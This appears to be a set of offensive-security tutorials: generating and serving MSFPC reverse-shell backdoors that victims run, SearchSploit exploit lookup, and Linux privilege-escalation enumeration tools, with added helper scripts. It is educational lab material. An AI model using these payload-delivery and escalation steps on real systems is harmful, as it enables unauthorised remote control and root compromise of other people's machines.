
Comprehensive Guide to MSFPC


Hello Friends!!
As you all know, MSFvenom is the Kali Linux tool for generating payloads. MSFvenom Payload Creator (MSFPC) builds on it: a wrapper that generates various "basic" Meterpreter payloads via msfvenom, with the end goal of fully automating msfvenom and Metasploit.

MSFvenom Payload Creator (MSFPC) is a wrapper that generates multiple types of payload based on the user's choice. The idea is to be as simple as possible (only one input is required) to produce a payload.

Author: g0tmi1k

SYNTAX
msfpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
Create a Payload with Interactive IP Mode
Let's create a payload for the Windows platform with the following command, giving only the platform so that MSFPC prompts for the rest:

msfpc windows

When you enter the above command, MSFPC asks which interface's address should be used as LHOST:

Which interface should be used?
eth0, lo, wan

We press 1 for eth0; MSFPC then generates the payload and reports the following:

1.       Location of the MSF handler file and of the Windows Meterpreter payload created.
2.       Command to start multi/handler automatically within the Metasploit Framework.
3.       Command to serve the file for transfer over a web server.



Basically, MSFPC is designed to reduce the user's effort in generating payloads for various platforms, each in its own file format. Typing "msfpc" with no arguments lists every supported platform and the file format generated for each.
Syntax: msfpc


Windows Payload

If you want a Meterpreter session on a victim's machine running Windows, all you need to do is type the following (the IP and port become LHOST and LPORT):
msfpc windows 192.168.1.109 1234
If you do not mention an IP, MSFPC asks you to choose an interface as discussed above, and if you omit the port it uses 443 as the default LPORT. It creates a malicious backdoor in .exe format for 32-bit architecture, then generates the payload and reports the following details:

·         Location of the MSF handler file and of the Windows Meterpreter payload created: '/root/windows-meterpreter-staged-reverse-tcp-1234.exe'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
·         Command to serve the file for transfer over a web server: python2 -m SimpleHTTPServer 8080



Now run the following commands to launch multi/handler and the web server for the file transfer. Start the web server from the directory that holds the payload (here /root), because SimpleHTTPServer serves its current working directory.
msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-1234-exe.rc'
python2 -m SimpleHTTPServer 8080



When the victim browses the following URL, the browser offers the .exe for download; running it gives the attacker a Meterpreter session. Note that the URL carries the web server's port (8080) and only the file name, not the /root/ directory the server was started in.
http://192.168.1.109:8080/windows-meterpreter-staged-reverse-tcp-1234.exe
Conclusion: Earlier, attackers used the manual method of generating a payload with the msfvenom command and then using the Metasploit module "multi/handler" to receive the reverse connection as a Meterpreter session. This technique compromises a victim's machine quite reliably but takes time. MSFPC applies the same approach, generating various "basic" Meterpreter payloads via msfvenom with a single command.



Android Payload
If you want a Meterpreter session on a victim's device running Android, all you need to do is type the following:
msfpc apk 192.168.1.109 1234
It creates a malicious backdoor in .apk format, then generates the payload and reports the following details:
·         Location of the MSF handler file and of the Android Meterpreter payload created: '/root/android-meterpreter-stageless-reverse-tcp-1234.apk'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'
·         Command to serve the file for transfer over a web server: python2 -m SimpleHTTPServer 8080



Now run the following commands to launch multi/handler and the web server for the file transfer (from the directory holding the payload).
msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-1234.apk.rc'

python2 -m SimpleHTTPServer 8080

When the victim browses the following URL, the device offers to install the application; once the .apk is installed and run, it gives the attacker a Meterpreter session.
http://192.168.1.109:8080/android-meterpreter-stageless-reverse-tcp-1234.apk



Hence, as shown above, we have a Meterpreter session on the target's device.



BASH
The advantage of MSFPC is that it removes the need to remember the msfvenom format for each platform: follow the syntax declared above and MSFPC manages the rest automatically. Suppose I want to create a payload for the Bash platform; MSFPC generates it in moments.

msfpc bash 192.168.1.109 1234
It creates a malicious backdoor in .sh format, then generates the payload and reports the following:
·         Location of the MSF handler file and of the Bash shell payload created: '/root/bash-shell-staged-reverse-tcp-1234.sh'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'
·         Command to serve the file for transfer over a web server: python2 -m SimpleHTTPServer 8080



Now run the following commands to launch multi/handler and the web server for the file transfer (from the directory holding the payload).
msfconsole -q -r '/root/bash-shell-staged-reverse-tcp-1234.sh.rc'

python2 -m SimpleHTTPServer 8080

When the victim fetches the script from the following URL, makes it executable and runs it, it gives a command shell (not yet Meterpreter). The execute bit is all that is needed; chmod 777 also works but grants more than necessary.
http://192.168.1.109:8080/bash-shell-staged-reverse-tcp-1234.sh
chmod +x bash-shell-staged-reverse-tcp-1234.sh
./bash-shell-staged-reverse-tcp-1234.sh



Hence, as shown above, we have a command shell on the target's machine, and with the following command (which runs post/multi/manage/shell_to_meterpreter against session 1) we upgrade it to a Meterpreter session.
sessions -u 1



Linux
If you want a Meterpreter session on a victim's machine running Linux, all you need to do is type the following:
msfpc linux 192.168.1.109 4444
It creates a malicious backdoor in .elf format, then generates the payload and reports the following details:
·         Location of the MSF handler file and of the Linux shell payload created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'
·         Command to serve the file for transfer over a web server: python2 -m SimpleHTTPServer 8080




Now run the following commands to launch multi/handler and the web server for the file transfer (from the directory holding the payload).
msfconsole -q -r '/root/linux-shell-staged-reverse-tcp-4444.elf.rc'

python2 -m SimpleHTTPServer 8080

When the victim fetches the file from the following URL, makes it executable and runs it, it gives a command shell.
http://192.168.1.109:8080/linux-shell-staged-reverse-tcp-4444.elf
chmod +x linux-shell-staged-reverse-tcp-4444.elf
./linux-shell-staged-reverse-tcp-4444.elf



Hence, as shown above, we have a command shell on the target's machine, and with the following command we upgrade it to a Meterpreter session.
sessions -u 1


Python
If you want a Meterpreter session on a victim's machine that has Python installed, all you need to do is type the following:
msfpc python 192.168.1.109 5555
It creates a malicious backdoor in .py format, then generates the payload and reports the following details:
·         Location of the MSF handler file and of the Python Meterpreter payload created: '/root/python-meterpreter-staged-reverse_tcp-5555.py'
·         Command to start multi/handler automatically: msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'
·         Command to serve the file for transfer over a web server: python2 -m SimpleHTTPServer 8080



Now run the following commands to launch multi/handler and the web server for the file transfer (from the directory holding the payload).
msfconsole -q -r '/root/python-meterpreter-staged-reverse_tcp-5555.py.rc'

python2 -m SimpleHTTPServer 8080

When the victim fetches the script from the following URL and runs it with the Python interpreter, it gives a Meterpreter session.
http://192.168.1.109:8080/python-meterpreter-staged-reverse_tcp-5555.py
python python-meterpreter-staged-reverse_tcp-5555.py



Hence, as shown above, we have a Meterpreter session on the target's machine.


Batch (Generates all Possible Combination Payloads)
Batch is the most significant mode, as it generates every possible combination of payload. If we want to create all payloads that give a Meterpreter session, we can use the following command:
msfpc msf batch eth0
In the output below you can see it has generated every payload type that yields a Meterpreter session. The remaining steps, executing a payload and receiving the reverse connection, are as above.



If we want to create all payloads that give a command shell session on the target's machine, we can use the following command:
msfpc cmd batch eth0
In the output below you can see it has generated every payload type that yields a command shell.




Loop (Generates One payload for Each Platform)
Loop is also a significant mode, as it generates one payload of each type with its default values. By default that means a payload giving a Meterpreter session rather than a command shell session.
msfpc verbose loop eth0
In the output below you can see it has generated one payload for each platform, each yielding a Meterpreter session. The remaining steps, executing a payload and receiving the reverse connection, are as above.



Generating Stageless Payload
As we all know there are two types of payload, staged and stageless, and by default MSFPC creates a staged payload. To create a stageless payload instead, use one of the following commands, for a command shell session or a Meterpreter session respectively:

msfpc stageless cmd windows 192.168.1.109
msfpc stageless msf windows 192.168.1.109

The remaining steps, executing the payload and receiving the reverse connection, are as above.
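To make the automation concrete, here is an added example, not MSFPC's own code and not part of the original article, that reproduces for any of the platform, shell and stage keywords used in the sections above the things MSFPC reports: the msfvenom payload name, the output file name, the resource script that msfconsole -q -r loads for multi/handler, and the download URL the target fetches. The payload table and the <os>-<shell>-<stage>-reverse-tcp-<port>.<ext> naming are my reconstruction of MSFPC's conventions, and the .rc body is a minimal handler script rather than a copy of what MSFPC writes.

```shell
#!/bin/sh
# Added example, not MSFPC's own code: reconstructs what MSFPC reports for one
# payload so the pieces behind "msfconsole -q -r file.rc" and the download URL
# are visible. Assumptions: the payload table and file naming mirror MSFPC's
# conventions; the .rc body is a minimal multi/handler script, not MSFPC's.

# msfvenom payload for a platform keyword (windows|apk|linux|bash|python), a
# shell type (msf = Meterpreter, cmd = command shell) and a stage
# (staged|stageless). Staged names join shell and transport with "/",
# stageless ones with "_".
msf_payload_name() {
  local os="$1" shell="$2" stage="$3" sep="/"
  if [ "$stage" = "stageless" ]; then sep="_"; fi
  case "$os/$shell" in
    windows/msf) echo "windows/meterpreter${sep}reverse_tcp" ;;
    windows/cmd) echo "windows/shell${sep}reverse_tcp" ;;
    apk/msf)     echo "android/meterpreter${sep}reverse_tcp" ;;
    linux/msf)   echo "linux/x86/meterpreter${sep}reverse_tcp" ;;
    linux/cmd)   echo "linux/x86/shell${sep}reverse_tcp" ;;
    python/msf)  echo "python/meterpreter${sep}reverse_tcp" ;;
    bash/cmd)    echo "cmd/unix/reverse_bash" ;;  # assumption: one form only
    *) echo "unsupported combination: $os/$shell" >&2; return 1 ;;
  esac
}

# Output file in MSFPC's style, e.g. android-meterpreter-stageless-reverse-tcp-1234.apk
msf_output_file() {
  local os="$1" shell="$2" stage="$3" port="$4" prefix ext kind=shell
  case "$os" in
    windows) prefix=windows; ext=exe ;;
    apk)     prefix=android; ext=apk ;;
    linux)   prefix=linux;   ext=elf ;;
    bash)    prefix=bash;    ext=sh ;;
    python)  prefix=python;  ext=py ;;
    *) return 1 ;;
  esac
  if [ "$shell" = "msf" ]; then kind=meterpreter; fi
  echo "${prefix}-${kind}-${stage}-reverse-tcp-${port}.${ext}"
}

# msfvenom -f value for an extension: exe and elf are real output formats,
# the others are written as raw bytes/text.
msf_format() {
  case "$1" in exe|elf) echo "$1" ;; *) echo raw ;; esac
}

# Minimal resource script for exploit/multi/handler. "ExitOnSession false"
# keeps the listener up after the first session; "exploit -j" runs it as a job.
msf_handler_rc() {
  local payload="$1" lhost="$2" lport="$3"
  printf '%s\n' \
    "use exploit/multi/handler" \
    "set PAYLOAD $payload" \
    "set LHOST $lhost" \
    "set LPORT $lport" \
    "set ExitOnSession false" \
    "exploit -j"
}

# URL the target fetches: "python2 -m SimpleHTTPServer 8080" serves the
# directory it was started in on port 8080, so the path is the file name only.
download_url() {
  echo "http://$1:$2/$3"
}

# Stand-alone usage: sh msfpc_pieces.sh windows msf staged 192.168.1.109 1234
if [ "$#" -eq 5 ]; then
  payload=$(msf_payload_name "$1" "$2" "$3") || exit 1
  file=$(msf_output_file "$1" "$2" "$3" "$5") || exit 1
  ext=${file##*.}
  rc="${file%.*}-${ext}.rc"
  msf_handler_rc "$payload" "$4" "$5" > "$rc"
  echo "msfvenom -p $payload LHOST=$4 LPORT=$5 -f $(msf_format "$ext") -o $file"
  echo "msfconsole -q -r $rc"
  echo "python2 -m SimpleHTTPServer 8080"
  download_url "$4" 8080 "$file"
fi
```

Run it as sh msfpc_pieces.sh windows msf stageless 192.168.1.109 443 and it prints the equivalent msfvenom command, writes the .rc file next to the payload and prints the URL with the web server's port, which is the form the target must use when the payload is served with python2 -m SimpleHTTPServer 8080 from the payload's directory.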



Comprehensive Guide on SearchSploit

Hello friends!! Several times you might have read our articles on CTF challenges and others, where we used searchsploit to find out whether an exploit is available in its database. Today in this article we are going to discuss SearchSploit in detail.

Table of Content
Introduction to SearchSploit
Title Searching
Advance Title Searching
Copy To Clipboard
Copy To Directory
Examine an Exploit
Examining Nmap result
Exploit-DB Online
Eliminate Unwanted Results
Case Sensitive

Introduction to SearchSploit

Included in the Exploit Database repository on GitHub is “searchsploit”, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. SearchSploit gives you the power to perform detailed off-line searches through your locally checked-out copy of the repository. This capability is particularly useful for security assessments on segregated or air-gapped networks without Internet access.

Since we are using the GNOME build of Kali Linux, the "exploitdb" package is already included by default; all we need to do is open a terminal, type "searchsploit" and press Enter. You will be welcomed by its help screen.

Searchsploit options

  -c, --case     [Term]      Carry out a case-sensitive search.
  -e, --exact    [Term]      Carry out an EXACT match on the exploit title [implies "-t"].
  -j, --json     [Term]      Give results in JSON format.
  -m, --mirror   [EDB-ID]    Mirror (aka copy) an exploit to the current working directory.
  -o, --overflow [Term]      Exploit titles are allowed to overflow their columns.
  -p, --path     [EDB-ID]    Show the full path to an exploit.
  -t, --title    [Term]      Search JUST the exploit title.
  -u, --update               Check for and install any exploitdb package updates.
  -w, --www      [Term]      Show URLs to Exploit-DB.com rather than the local path.
  -x, --examine  [EDB-ID]    Examine the exploit using $PAGER.
      --colour               Disable colour highlighting in search results.
      --id                   Display the EDB-ID value rather than the local path.
      --nmap     [file.xml]  Check all results in Nmap's XML output with service version (e.g.: nmap -sV -oX file.xml).
                             Use "-v" (verbose) to try even more combinations.
      --exclude="term"       Remove values from results, e.g. --exclude="term1|term2|term3".

Source: https://www.exploit-db.com/searchsploit/
Title Searching

The -t option restricts the search to the exploit title. By default searchsploit matches the term against both the exploit's title and its file path, so a title-only search gives quicker and cleaner results.



Advance Title Searching
You can also use -t with several terms to narrow the result to exploits for a particular platform. For example, to find Java exploits for the Windows platform, consider the following command:
searchsploit -t java windows

Now compare this output with the previous result.



Copy to Clipboard
The -p option shows the full path to an exploit together with its other details and, when a clipboard tool is available, also copies that path to the clipboard, so all you need to do is press Ctrl+V to paste it.

searchsploit 39166
searchsploit -p 39166


In the following image we show how the default result differs when -p is used.



Copy to Directory

The -m option mirrors the exploit: it shows the same information as above and copies the exploit file into your current working directory.

searchsploit 39166
searchsploit -m 39166

In the following image we show how the default result differs when -m is used.




Examine an Exploit
The -x (--examine) option opens the exploit in $PAGER so that you can read its functionality.
searchsploit -x 39166



The above command opens the exploit's source file to review its functionality, code and other information.



Examining Nmap result
As we all know, Nmap has the remarkable feature of saving its results in .xml format, and searchsploit can look up exploits for every service version recorded in that XML file.
 
nmap -sV 192.168.1.102 -oX result.xml
With the above command we saved Nmap's scan result in an XML file (-sV is required, since the lookup uses the detected service versions), so that we can search for exploits related to the scanned ports/services.




The --nmap option reads that XML and searches for exploits matching each service's product and version; adding -v (verbose) makes it try even more combinations of the version string, which helps when the exact version string does not appear in any exploit title.
searchsploit --nmap result.xml
searchsploit -v --nmap result.xml
Here you can observe that it reads the XML file and shows all available exploits for the running services.
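Since the --nmap lookup is only as good as the search terms it derives, here is an added example, not searchsploit's code and not from the original article, that shows offline how a service line from nmap -sV -oX turns into title searches, and why -v helps: it keeps the first token of the version, strips distro packaging noise and then tries progressively shorter versions. The XML fragment is constructed, and the shortening rules approximate searchsploit's heuristics rather than copying them.

```shell
#!/bin/sh
# Added example (not searchsploit's own code). Shows, offline, how a service
# line from "nmap -sV -oX" becomes the title searches behind "--nmap", and why
# "-v" matters: the full version string rarely matches an exploit title, so
# progressively shorter "product version" terms are tried. This approximates
# searchsploit's heuristics; it is not a copy of them.

# Constructed nmap XML fragment (not a real scan), one <service> per line.
SAMPLE_NMAP_XML='<port protocol="tcp" portid="22"><state state="open" reason="syn-ack"/><service name="ssh" product="OpenSSH" version="7.2p2 Ubuntu 4ubuntu2.4" extrainfo="Ubuntu Linux; protocol 2.0" method="probed" conf="10"/></port>
<port protocol="tcp" portid="80"><state state="open" reason="syn-ack"/><service name="http" product="Apache httpd" version="2.4.18" extrainfo="(Ubuntu)" method="probed" conf="10"/></port>
<port protocol="tcp" portid="3306"><state state="open" reason="syn-ack"/><service name="mysql" method="table" conf="3"/></port>'

# Read nmap XML on stdin and print "product|version" for every service that
# has both attributes. Services known only from the port table (no product,
# like the mysql line above) are skipped: there is nothing to search for.
nmap_service_terms() {
  grep -o '<service [^>]*>' |
    sed -n 's/.*product="\([^"]*\)".*version="\([^"]*\)".*/\1|\2/p'
}

# Title-search candidates for one product and version, most specific first:
# keep only the first token of the version (drops "Ubuntu 4ubuntu2.4"), then
# strip a letter suffix such as "p2", then drop dotted components one by one.
# "OpenSSH" "7.2p2 Ubuntu 4ubuntu2.4" -> "OpenSSH 7.2p2", "OpenSSH 7.2", "OpenSSH 7"
search_candidates() {
  local product="$1" ver="${2%% *}" v
  printf '%s %s\n' "$product" "$ver"
  v=$(printf '%s' "$ver" | sed 's/[A-Za-z].*$//')
  if [ -n "$v" ] && [ "$v" != "$ver" ]; then
    printf '%s %s\n' "$product" "$v"
  fi
  while [ "${v%.*}" != "$v" ]; do
    v=${v%.*}
    printf '%s %s\n' "$product" "$v"
  done
}

# Run the searches, or just print them when searchsploit is not installed.
# "-t" restricts the match to the exploit title, as the article recommends;
# the term is left unquoted on purpose so each word becomes an AND term.
searchsploit_from_nmap() {
  nmap_service_terms | while IFS='|' read -r product version; do
    search_candidates "$product" "$version" | while read -r term; do
      if command -v searchsploit >/dev/null 2>&1; then
        searchsploit -t $term
      else
        echo "searchsploit -t $term"
      fi
    done
  done
}

# Stand-alone usage: sh searchsploit_nmap.sh result.xml (no argument: sample above)
if [ -n "${1:-}" ]; then
  searchsploit_from_nmap < "$1"
else
  printf '%s\n' "$SAMPLE_NMAP_XML" | searchsploit_from_nmap
fi
```

Without searchsploit installed it prints the commands it would run, which makes the effect of the shortening visible: OpenSSH 7.2p2 is followed by OpenSSH 7.2 and OpenSSH 7, the broader terms that the verbose mode of the real tool also falls back to.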








Exploit-DB Online
The -w option shows the Exploit-DB website URL instead of the local path, because on the website you get more detailed information, such as the CVE-ID, setup files, tags and vulnerability mappings, which is not included in searchsploit.

searchsploit ubuntu 14.04 -w
The above command shows the Exploit-DB website links for all exploits related to Ubuntu 14.04.




Eliminate Unwanted Results
The --exclude option removes unwanted results from the list of exploits. You can also remove multiple terms by separating them with a "|" (pipe). Compare the following:
searchsploit ubuntu 14.04
searchsploit ubuntu 14.04 --exclude="Privilege Escalation"

In the following image we show how the default result differs when --exclude is used. You can eliminate more terms with the help of "|" (pipe):

searchsploit ubuntu 14.04 --exclude="Privilege Escalation|PoC"




Moreover, we can use the universal grep command to filter the output; here grep keeps only the lines we want rather than removing the unwanted ones:
searchsploit ubuntu 14.04
searchsploit ubuntu 14.04 | grep "Buffer Overflow"
The above command lists only the available Ubuntu 14.04 exploits whose line contains "Buffer Overflow".




Case Sensitive
The -c option enables a case-sensitive search, finding exploits that match the exact case of the term given on the command line; by default the search is case-insensitive. Consider the following example:
searchsploit xss
searchsploit -c XSS

As you can observe, by default it shows all available exploits matching xss/XSS, but the second command shows results only for XSS.


Linux Privilege Escalation via Automated Script


We all know that after compromising a victim's machine we have a low-privilege shell that we want to escalate to a higher-privileged shell; this process is known as privilege escalation. Today in this article we discuss what comes under privilege escalation and how an attacker can identify whether a low-privilege shell can be escalated to a higher-privileged one. Beyond that, there are several Linux scripts that come in useful when trying to escalate privileges on a target system. They are generally aimed at enumeration rather than at specific vulnerabilities/exploits, and they can save you a lot of time.
Table of Content
·         Introduction
·         Vectors of Privilege Escalation
·         LinEnum
·         Linuxprivchecker
·         Linux Exploit Suggester 2
·         Bashark
·         BeRoot

Introduction
Basically, privilege escalation is the phase after the attacker has compromised the victim's machine, in which he gathers critical information about the system such as hidden passwords and weakly configured services or applications. All this information helps the attacker in post-exploitation of the machine to obtain a higher-privileged shell.

Vectors of Privilege Escalation

§  OS Detail & Kernel Version
§  Any Vulnerable package installed or running
§  Files and Folders with Full Control or Modify Access
§  File with SUID Permissions  
§  Mapped Drives (NFS)
§  Potentially Interesting Files
§  Environment Variable Path
§  Network Information (interfaces, arp, netstat)
§  Running Processes
§  Cronjobs
§  User’s Sudo Right
§  Wildcard Injection

Several scripts are used in penetration testing to quickly identify potential privilege escalation vectors on Linux systems, and today we elaborate on each script that works smoothly.
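Before the scripts themselves, here is an added example, not code from LinEnum, linuxprivchecker, Bashark or BeRoot, that implements a handful of the vectors in the list above as small shell functions: password hashes in /etc/passwd, NFS no_root_squash exports, SUID files, writable cron files, writable PATH entries and passwordless sudo rules. Each function takes the path it reads as an argument so it can be run against constructed fixtures, which make_samples writes to a temporary directory; the fixtures, file names and function names are all my own.

```shell
#!/bin/sh
# Added example (not LinEnum, linuxprivchecker or BeRoot code): a small
# enumeration script covering some of the vectors listed above. Each check
# takes the path it reads as an argument, defaulting to the live system
# location, so it can be exercised against constructed fixtures without root.

# /etc/passwd entries whose password field is not "x", "*" or "!" either carry
# a hash that can be cracked offline or are empty (no password at all).
passwd_hash_entries() {
  awk -F: '$2 != "x" && $2 != "*" && $2 != "!" { print $1 ":" $2 }' "${1:-/etc/passwd}"
}

# NFS exports with no_root_squash: a remote root can drop a root-owned SUID
# binary into the share and run it on this host.
nfs_no_root_squash() {
  grep -v '^[[:space:]]*#' "${1:-/etc/exports}" 2>/dev/null | grep no_root_squash || true
}

# SUID files below a root directory (default: the whole filesystem).
suid_files() {
  find "${1:-/}" -type f -perm -4000 2>/dev/null || true
}

# Cron definitions the current user can modify: anything written there runs
# as the job's owner, usually root.
writable_cron_files() {
  local f
  for f in "${1:-/etc/cron.d}"/* "${2:-/etc/crontab}"; do
    if [ -f "$f" ] && [ -w "$f" ]; then echo "$f"; fi
  done
}

# PATH entries the current user can write to: a binary dropped there shadows
# commands that scripts, cron jobs or sudo rules invoke by bare name.
# Runs in a subshell so the IFS change does not leak.
writable_path_dirs() (
  IFS=:
  for d in ${1:-$PATH}; do
    if [ -d "$d" ] && [ -w "$d" ]; then echo "$d"; fi
  done
)

# Sudo rules usable without a password (-n fails instead of prompting).
sudo_rules() {
  sudo -n -l 2>/dev/null || echo "(sudo -n -l not permitted or sudo absent)"
}

# Constructed fixtures (not real system files). Prints the directory they are in.
make_samples() {
  local d
  d=$(mktemp -d)
  printf '%s\n' 'root:x:0:0:root:/root:/bin/bash' \
    'raj:$6$salt$hashhashhash:1000:1000::/home/raj:/bin/bash' \
    'guest::1001:1001::/home/guest:/bin/sh' > "$d/passwd"
  printf '%s\n' '# shares' '/srv/share *(rw,sync,no_root_squash)' '/srv/pub *(ro)' > "$d/exports"
  mkdir -p "$d/bin" "$d/cron.d"
  printf '#!/bin/sh\nid\n' > "$d/bin/asroot"; chmod 4755 "$d/bin/asroot"
  printf '%s\n' '* * * * * root /opt/backup.sh' > "$d/cron.d/backup"; chmod 666 "$d/cron.d/backup"
  echo "$d"
}

# Stand-alone usage: "sh privesc_checks.sh live" for the real system,
# "sh privesc_checks.sh demo" for the fixtures above.
case "${1:-}" in
  live)
    echo "[passwd hashes]"; passwd_hash_entries
    echo "[no_root_squash]"; nfs_no_root_squash
    echo "[SUID]";           suid_files
    echo "[writable cron]";  writable_cron_files
    echo "[writable PATH]";  writable_path_dirs
    echo "[sudo]";           sudo_rules ;;
  demo)
    d=$(make_samples)
    echo "[passwd hashes]"; passwd_hash_entries "$d/passwd"
    echo "[no_root_squash]"; nfs_no_root_squash "$d/exports"
    echo "[SUID]";           suid_files "$d"
    echo "[writable cron]";  writable_cron_files "$d/cron.d" "$d/no-crontab"
    echo "[writable PATH]";  writable_path_dirs "$d/bin:/nonexistent"
    rm -rf "$d" ;;
esac
```

The demo run flags exactly the planted weaknesses (the hashed and empty password entries, the no_root_squash export, the SUID script, the world-writable cron file and the writable PATH directory), which is the same shape of output the scripts below produce on a real host, only with far fewer checks.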

LinEnum
Scripted local Linux enumeration and privilege escalation checks: a shell script that enumerates the system configuration. A high-level summary of the checks/tasks performed by LinEnum:
Privileged access: diagnoses whether the current user has sudo access without a password and whether root's home directory is accessible.
System information: hostname, networking details, current IP, etc.
User information: current user, list of all users including uid/gid information, list of root accounts, check whether password hashes are stored in /etc/passwd.
Kernel and distribution release details.

You can download it through github with help of following command:
git clone https://github.com/rebootuser/LinEnum.git

Once you have downloaded the script, you can simply run it by typing ./LinEnum.sh in the terminal. It dumps all the fetched data and system details.

Let's analyse what its result brings us:
OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1
Hostname: Ubuntu
Moreover…..
Super User Accounts: root, demo, hack, raaz
Sudo Rights User: Ignite, raj
Home Directories File Permission
Environment Information
And many more such things which comes under the Post exploitation.
Linuxprivchecker
Enumerates the system configuration and runs some privilege escalation checks as well. It is a Python implementation that suggests exploits specific to the system that has been taken over. Use wget to download the script from its source URL.
wget http://www.securitysift.com/download/linuxprivchecker.py

To use the script, type python linuxprivchecker.py in the terminal; it enumerates file and directory permissions/contents. This script works much like LinEnum and hunts for details related to the system, network and users.
python linuxprivchecker.py
Let's analyse what its result brings us.
OS & Kernel Info: 4.15.0-36-generic, Ubuntu-16.04.1
Hostname: Ubuntu
Network Info: Interface, Netstat

Writable directories and files for users other than root: /home/raj/script/shell.py
Checks whether root's home folder is accessible
Files with SUID/SGID permission
For example: /bin/raj/asroot.sh, a bash script with SUID permission


Linux Exploit Suggester 2
Next-generation exploit suggester based on Linux_Exploit_Suggester. This program performs a 'uname -r' to grab the Linux operating system release version, and returns a list of possible exploits.
This script is extremely useful for quickly finding privilege escalation vulnerabilities both in on-site and exam environments.
Key Improvements Include:
·         More exploits
·         Accurate wildcard matching. This expands the scope of searchable exploits.
·         Output colorization for easy viewing.
·         And more to come

git clone https://github.com/jondonas/linux-exploit-suggester-2.git
cd linux-exploit-suggester-2


You can use the '-k' flag to manually enter a wildcard for the kernel/operating system release version.
./linux-exploit-suggester-2.pl -k 3.5
Bashark
Bashark aids pentesters and security researchers during the post-exploitation phase of security audits.
Its Features
·         Single Bash script
·         Lightweight and fast
·         Multi-platform: Unix, OSX, Solaris etc.
·         No external dependencies
·         Immune to heuristic and behavioural analysis
·         Built-in aliases of often used shell commands
·         Extends system shell with post-exploitation oriented functionalities
·         Stealthy, with custom cleanup routine activated on exit
·         Easily extensible (add new commands by creating Bash functions)
·         Full tab completion

Execute following command to download it from the github:
git clone https://github.com/TheSecondSun/Bashark.git
cd Bashark


To execute the script you need to run following command:
source bashark.sh
help
The help command lists all the options Bashark provides for post-exploitation.


With the portscan option you can scan the internal network from the compromised machine.
The getconf option pulls out all configuration files stored inside the /etc directory. Similarly, the getprem option lists the binaries on the target's machine.
portscan < target’s IP>
getconf
getprem


BeRoot
BeRoot is a post-exploitation tool that checks common misconfigurations to find a way to escalate privilege. It does not perform any exploitation. Its main goal is not a configuration assessment of the host (listing all services, all processes, all network connections, etc.) but to print only information that has been found to be a potential way to escalate privilege.
git clone https://github.com/AlessandroZ/BeRoot.git
cd BeRoot/Linux
chmod +x beroot.py


To execute the script you need to run following command:
./beroot.py
It tries to enumerate every loophole that could lead to privilege escalation. In the output, text highlighted in yellow represents a weak configuration that could lead to root privilege escalation, whereas red represents the technique that can be used to exploit it.
It’s Functions:
Check Files Permissions
SUID bin
NFS root Squashing
Docker
Sudo rules
Kernel Exploit


Conclusion: All the scripts above are available on GitHub and are easy to download from there. These automated scripts try to identify weak configurations that can lead to root privilege escalation.